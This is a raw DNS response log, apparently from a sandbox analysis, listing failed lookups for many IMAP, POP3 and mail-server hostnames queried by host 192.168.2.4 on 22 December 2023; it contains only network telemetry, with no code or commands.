Dec 22, 2023 21:15:02.303112984 CET	1.1.1.1	192.168.2.4	0x9ff0	Name error (3)	imap.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.312982082 CET	1.1.1.1	192.168.2.4	0xf6f9	Name error (3)	mail.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.314874887 CET	1.1.1.1	192.168.2.4	0x17dc	Name error (3)	pop3.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.315440893 CET	1.1.1.1	192.168.2.4	0x988f	Name error (3)	imap.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.316824913 CET	1.1.1.1	192.168.2.4	0xa452	Name error (3)	pop3.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.318772078 CET	1.1.1.1	192.168.2.4	0x51bd	Name error (3)	imap.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.327917099 CET	1.1.1.1	192.168.2.4	0xdf91	Name error (3)	imap.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.330287933 CET	1.1.1.1	192.168.2.4	0xfd71	Name error (3)	imap.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.330317974 CET	1.1.1.1	192.168.2.4	0x5c64	Name error (3)	imap.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.330792904 CET	1.1.1.1	192.168.2.4	0x6160	Name error (3)	imap.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.330882072 CET	1.1.1.1	192.168.2.4	0x146d	Name error (3)	pop3.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.331798077 CET	1.1.1.1	192.168.2.4	0x32a9	Name error (3)	pop3.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.335648060 CET	1.1.1.1	192.168.2.4	0x1d1b	Name error (3)	relay.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.342813969 CET	1.1.1.1	192.168.2.4	0xca98	Name error (3)	imap.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.343848944 CET	1.1.1.1	192.168.2.4	0xf17f	Name error (3)	imap.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.345535994 CET	1.1.1.1	192.168.2.4	0xd8a6	Name error (3)	pop3.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.347698927 CET	1.1.1.1	192.168.2.4	0xce7c	Name error (3)	pop3.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.350514889 CET	1.1.1.1	192.168.2.4	0x537c	Name error (3)	imap.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.357402086 CET	1.1.1.1	192.168.2.4	0x997a	Name error (3)	pop3.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.359502077 CET	1.1.1.1	192.168.2.4	0x5db2	Name error (3)	pop3.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.361417055 CET	1.1.1.1	192.168.2.4	0xbb0a	Name error (3)	pop3.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.365274906 CET	1.1.1.1	192.168.2.4	0xdc4a	Name error (3)	pop3.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.385346889 CET	1.1.1.1	192.168.2.4	0xd030	Name error (3)	imap.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.391644001 CET	1.1.1.1	192.168.2.4	0x51bd	Name error (3)	imap.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.411426067 CET	1.1.1.1	192.168.2.4	0x94d1	Name error (3)	pop3.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.427910089 CET	1.1.1.1	192.168.2.4	0x1b48	Name error (3)	imap.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.447087049 CET	1.1.1.1	192.168.2.4	0x537c	Name error (3)	imap.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.447244883 CET	1.1.1.1	192.168.2.4	0xf17f	Name error (3)	imap.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.447319984 CET	1.1.1.1	192.168.2.4	0xd030	Name error (3)	imap.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.447643995 CET	1.1.1.1	192.168.2.4	0x1d1b	Name error (3)	relay.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.447680950 CET	1.1.1.1	192.168.2.4	0x94d1	Name error (3)	pop3.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.456583977 CET	1.1.1.1	192.168.2.4	0xa795	Name error (3)	imap.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.520072937 CET	1.1.1.1	192.168.2.4	0x997a	Name error (3)	pop3.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.520137072 CET	1.1.1.1	192.168.2.4	0xbb0a	Name error (3)	pop3.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.520472050 CET	1.1.1.1	192.168.2.4	0x5db2	Name error (3)	pop3.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.520536900 CET	1.1.1.1	192.168.2.4	0xdc4a	Name error (3)	pop3.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.562467098 CET	1.1.1.1	192.168.2.4	0x5342	Name error (3)	pop3.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.565944910 CET	1.1.1.1	192.168.2.4	0x1c2f	Name error (3)	pop3.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.594475031 CET	1.1.1.1	192.168.2.4	0x3721	Name error (3)	pop3.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.594836950 CET	1.1.1.1	192.168.2.4	0x6b7c	Name error (3)	pop3.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.607835054 CET	1.1.1.1	192.168.2.4	0x3a02	Name error (3)	mail.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.700751066 CET	1.1.1.1	192.168.2.4	0x3a02	Name error (3)	mail.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.704144955 CET	1.1.1.1	192.168.2.4	0x5e1e	Name error (3)	imap.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.716814041 CET	1.1.1.1	192.168.2.4	0x3721	Name error (3)	pop3.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.716988087 CET	1.1.1.1	192.168.2.4	0x6b7c	Name error (3)	pop3.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.721934080 CET	1.1.1.1	192.168.2.4	0x5edd	Name error (3)	imap.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.722630978 CET	1.1.1.1	192.168.2.4	0xab81	Name error (3)	imap.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.729173899 CET	1.1.1.1	192.168.2.4	0xe931	Name error (3)	pop3.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.736521959 CET	1.1.1.1	192.168.2.4	0xfb7c	Name error (3)	pop3.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.739031076 CET	1.1.1.1	192.168.2.4	0x4bda	Name error (3)	pop3.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.752770901 CET	1.1.1.1	192.168.2.4	0xa172	Name error (3)	pop3.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.753077030 CET	1.1.1.1	192.168.2.4	0xd36a	Name error (3)	pop3.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.756314039 CET	1.1.1.1	192.168.2.4	0x51f4	Name error (3)	pop3.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.758784056 CET	1.1.1.1	192.168.2.4	0xa597	Name error (3)	imap.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.759036064 CET	1.1.1.1	192.168.2.4	0x7077	Name error (3)	imap.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.761140108 CET	1.1.1.1	192.168.2.4	0x669a	Name error (3)	pop3.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.764548063 CET	1.1.1.1	192.168.2.4	0x153	Name error (3)	mailgate.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.771002054 CET	1.1.1.1	192.168.2.4	0x5c4f	Name error (3)	pop3.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.771145105 CET	1.1.1.1	192.168.2.4	0x794e	Name error (3)	mail.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.778544903 CET	1.1.1.1	192.168.2.4	0x139d	Name error (3)	pop3.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.782689095 CET	1.1.1.1	192.168.2.4	0x83cf	Name error (3)	pop3.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.784466982 CET	1.1.1.1	192.168.2.4	0x6d4a	Name error (3)	imap.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.786710024 CET	1.1.1.1	192.168.2.4	0x9765	Name error (3)	pop3.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.786957026 CET	1.1.1.1	192.168.2.4	0xe366	Name error (3)	pop3.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.787266970 CET	1.1.1.1	192.168.2.4	0xa77a	Name error (3)	pop3.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.793173075 CET	1.1.1.1	192.168.2.4	0xe42f	Name error (3)	caribbean360-com.p40.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.794177055 CET	1.1.1.1	192.168.2.4	0xf409	Name error (3)	imap.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.795566082 CET	1.1.1.1	192.168.2.4	0x8d59	Name error (3)	imap.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.802550077 CET	1.1.1.1	192.168.2.4	0x61c4	Name error (3)	imap.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.804758072 CET	1.1.1.1	192.168.2.4	0x1fb6	Name error (3)	pop3.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.806057930 CET	1.1.1.1	192.168.2.4	0x9cc1	Name error (3)	imap.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.810472012 CET	1.1.1.1	192.168.2.4	0x6960	Name error (3)	imap.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.811474085 CET	1.1.1.1	192.168.2.4	0x8f91	Name error (3)	pop3.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.811762094 CET	1.1.1.1	192.168.2.4	0xffd1	Name error (3)	imap.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.814126968 CET	1.1.1.1	192.168.2.4	0x9283	Name error (3)	pop3.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.819060087 CET	1.1.1.1	192.168.2.4	0xbaf	Name error (3)	pop3.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.829010963 CET	1.1.1.1	192.168.2.4	0xf979	Name error (3)	imap.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.956070900 CET	1.1.1.1	192.168.2.4	0xacd5	Name error (3)	pop3.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.982953072 CET	1.1.1.1	192.168.2.4	0x8721	Name error (3)	caribbean360-com.p10.spamhero.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.990092039 CET	1.1.1.1	192.168.2.4	0x2514	Name error (3)	pop3.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.174705029 CET	1.1.1.1	192.168.2.4	0x7077	Name error (3)	imap.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175045013 CET	1.1.1.1	192.168.2.4	0xe42f	Name error (3)	caribbean360-com.p40.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175142050 CET	1.1.1.1	192.168.2.4	0x153	Name error (3)	mailgate.harrell-associates.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175152063 CET	1.1.1.1	192.168.2.4	0xffd1	Name error (3)	imap.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175230026 CET	1.1.1.1	192.168.2.4	0x9765	Name error (3)	pop3.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175287008 CET	1.1.1.1	192.168.2.4	0xbaf	Name error (3)	pop3.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175375938 CET	1.1.1.1	192.168.2.4	0x5c4f	Name error (3)	pop3.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175425053 CET	1.1.1.1	192.168.2.4	0x669a	Name error (3)	pop3.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.175602913 CET	1.1.1.1	192.168.2.4	0x8721	Name error (3)	caribbean360-com.p10.spamhero.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.177856922 CET	1.1.1.1	192.168.2.4	0xa77a	Name error (3)	pop3.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.178129911 CET	1.1.1.1	192.168.2.4	0x2514	Name error (3)	pop3.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.183501005 CET	1.1.1.1	192.168.2.4	0x8d59	Name error (3)	imap.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.183561087 CET	1.1.1.1	192.168.2.4	0xf409	Name error (3)	imap.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.183576107 CET	1.1.1.1	192.168.2.4	0x61c4	Name error (3)	imap.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184288979 CET	1.1.1.1	192.168.2.4	0xacd5	Name error (3)	pop3.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184335947 CET	1.1.1.1	192.168.2.4	0x9283	Name error (3)	pop3.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184376001 CET	1.1.1.1	192.168.2.4	0x6d4a	Name error (3)	imap.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184422016 CET	1.1.1.1	192.168.2.4	0x6960	Name error (3)	imap.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184487104 CET	1.1.1.1	192.168.2.4	0xf979	Name error (3)	imap.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184606075 CET	1.1.1.1	192.168.2.4	0x1fb6	Name error (3)	pop3.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184644938 CET	1.1.1.1	192.168.2.4	0x794e	Name error (3)	mail.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184751987 CET	1.1.1.1	192.168.2.4	0x83cf	Name error (3)	pop3.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184762001 CET	1.1.1.1	192.168.2.4	0xe366	Name error (3)	pop3.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.184864044 CET	1.1.1.1	192.168.2.4	0x9cc1	Name error (3)	imap.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.185306072 CET	1.1.1.1	192.168.2.4	0x139d	Name error (3)	pop3.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:03.185465097 CET	1.1.1.1	192.168.2.4	0x8f91	Name error (3)	pop3.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.233108997 CET	1.1.1.1	192.168.2.4	0xb6be	Name error (3)	mail.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.234019041 CET	1.1.1.1	192.168.2.4	0x712b	Name error (3)	mail.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.234370947 CET	1.1.1.1	192.168.2.4	0xefa1	Name error (3)	mail.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.240895033 CET	1.1.1.1	192.168.2.4	0x1df5	Name error (3)	mail.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.241945028 CET	1.1.1.1	192.168.2.4	0xc005	Name error (3)	pop3.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.242386103 CET	1.1.1.1	192.168.2.4	0xb63e	Name error (3)	relay.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.256949902 CET	1.1.1.1	192.168.2.4	0xd7d5	Name error (3)	relay.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.267195940 CET	1.1.1.1	192.168.2.4	0xc1ef	Name error (3)	mail.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.277884007 CET	1.1.1.1	192.168.2.4	0x80d1	Name error (3)	mailgate.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.288002014 CET	1.1.1.1	192.168.2.4	0xe430	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.289105892 CET	1.1.1.1	192.168.2.4	0xe11	Name error (3)	pop3.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.289187908 CET	1.1.1.1	192.168.2.4	0xbf1	Name error (3)	mailgate.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.289704084 CET	1.1.1.1	192.168.2.4	0xfe4e	Name error (3)	mail.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.290460110 CET	1.1.1.1	192.168.2.4	0x85f8	Name error (3)	mail.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.292762995 CET	1.1.1.1	192.168.2.4	0x9b3c	Name error (3)	pop3.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.293215036 CET	1.1.1.1	192.168.2.4	0x8668	Name error (3)	mail.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.296942949 CET	1.1.1.1	192.168.2.4	0xd97a	Name error (3)	mail.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.298659086 CET	1.1.1.1	192.168.2.4	0xe2b8	Name error (3)	mail.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.299266100 CET	1.1.1.1	192.168.2.4	0x465c	Name error (3)	mail.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.302414894 CET	1.1.1.1	192.168.2.4	0xb635	Name error (3)	mail.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.308985949 CET	1.1.1.1	192.168.2.4	0x9709	Name error (3)	pop3.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.312536955 CET	1.1.1.1	192.168.2.4	0xb57c	Name error (3)	mail.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.319539070 CET	1.1.1.1	192.168.2.4	0x15d0	Name error (3)	pop.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.321367979 CET	1.1.1.1	192.168.2.4	0x1ce8	Name error (3)	mail.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.323889017 CET	1.1.1.1	192.168.2.4	0xf9c2	Name error (3)	mail.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.324646950 CET	1.1.1.1	192.168.2.4	0x256b	Name error (3)	mail.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.328543901 CET	1.1.1.1	192.168.2.4	0x651b	Name error (3)	imap.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.333352089 CET	1.1.1.1	192.168.2.4	0xa709	Name error (3)	mail.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.335102081 CET	1.1.1.1	192.168.2.4	0xe66b	Name error (3)	mailgate.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.337394953 CET	1.1.1.1	192.168.2.4	0xe30b	Name error (3)	mail.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.338115931 CET	1.1.1.1	192.168.2.4	0xc726	Name error (3)	mail.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.348026037 CET	1.1.1.1	192.168.2.4	0x3ede	Name error (3)	pop3.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.359703064 CET	1.1.1.1	192.168.2.4	0x527e	Name error (3)	mail.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.372045040 CET	1.1.1.1	192.168.2.4	0x8499	Name error (3)	mail.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.375523090 CET	1.1.1.1	192.168.2.4	0x792a	Name error (3)	mail.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.376562119 CET	1.1.1.1	192.168.2.4	0x9f90	Name error (3)	mail.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.378623009 CET	1.1.1.1	192.168.2.4	0xf7a	Name error (3)	mail.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.378705978 CET	1.1.1.1	192.168.2.4	0x92a0	Name error (3)	mail.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.392714977 CET	1.1.1.1	192.168.2.4	0xe43	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.393718004 CET	1.1.1.1	192.168.2.4	0x3ede	Name error (3)	pop3.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.393826962 CET	1.1.1.1	192.168.2.4	0xd97a	Name error (3)	mail.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.393963099 CET	1.1.1.1	192.168.2.4	0xe2b8	Name error (3)	mail.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.394784927 CET	1.1.1.1	192.168.2.4	0xc232	Name error (3)	mail.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.395807981 CET	1.1.1.1	192.168.2.4	0x8832	Name error (3)	mail.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.395972967 CET	1.1.1.1	192.168.2.4	0x7667	Name error (3)	pop3.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.396270990 CET	1.1.1.1	192.168.2.4	0xc486	Name error (3)	imap.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.398308992 CET	1.1.1.1	192.168.2.4	0xe1fc	Name error (3)	mail.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.401453972 CET	1.1.1.1	192.168.2.4	0xccbb	Name error (3)	mail.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.402498007 CET	1.1.1.1	192.168.2.4	0xe430	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.403639078 CET	1.1.1.1	192.168.2.4	0xbeb4	Name error (3)	mail.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.404428959 CET	1.1.1.1	192.168.2.4	0xc1c4	Name error (3)	mailgate.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.421868086 CET	1.1.1.1	192.168.2.4	0x67ad	Name error (3)	caribbean360-com.p20.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.436451912 CET	1.1.1.1	192.168.2.4	0x8d4	Name error (3)	mail.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.439332962 CET	1.1.1.1	192.168.2.4	0xc486	Name error (3)	imap.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.441345930 CET	1.1.1.1	192.168.2.4	0x659c	Name error (3)	pop3.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.442605019 CET	1.1.1.1	192.168.2.4	0xdf67	Name error (3)	imap.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.442717075 CET	1.1.1.1	192.168.2.4	0x6cc2	Name error (3)	imap.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.443711996 CET	1.1.1.1	192.168.2.4	0xa97e	Name error (3)	mail.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.461848974 CET	1.1.1.1	192.168.2.4	0xe752	Name error (3)	mail.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.467751026 CET	1.1.1.1	192.168.2.4	0x5fd3	Name error (3)	mail.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.468183994 CET	1.1.1.1	192.168.2.4	0xb384	Name error (3)	mail.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.473721027 CET	1.1.1.1	192.168.2.4	0xf39e	Name error (3)	mail.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.476715088 CET	1.1.1.1	192.168.2.4	0x2193	Name error (3)	mail.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.495012999 CET	1.1.1.1	192.168.2.4	0x659c	Name error (3)	pop3.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.495066881 CET	1.1.1.1	192.168.2.4	0x8832	Name error (3)	mail.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.495111942 CET	1.1.1.1	192.168.2.4	0x6cc2	Name error (3)	imap.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
